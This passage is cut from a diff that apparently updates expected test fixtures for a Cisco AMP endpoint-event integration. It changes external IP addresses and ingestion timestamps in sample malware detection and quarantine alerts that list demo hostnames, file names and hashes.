Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:51.461614400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -2127,7 +2127,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2174,7 +2174,7 @@ "5058b16a86beee96927371210b9a9f682976a50a" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2188,8 +2188,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103768528Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "ingested": "2021-12-09T13:35:51.461636400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2211,7 +2211,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2254,7 +2254,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2268,8 +2268,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103770531Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:51.461641200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2291,7 +2291,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2332,7 +2332,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2342,8 +2342,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103772565Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461646400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2363,7 +2363,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2417,7 +2417,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2434,8 +2434,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103774575Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461651400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2457,7 +2457,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2512,7 +2512,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2529,8 +2529,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103776615Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461655300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2552,7 +2552,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2606,7 +2606,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2619,8 +2619,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103778634Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461659900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2642,7 +2642,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2701,7 +2701,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2718,8 +2718,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103780658Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461665900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 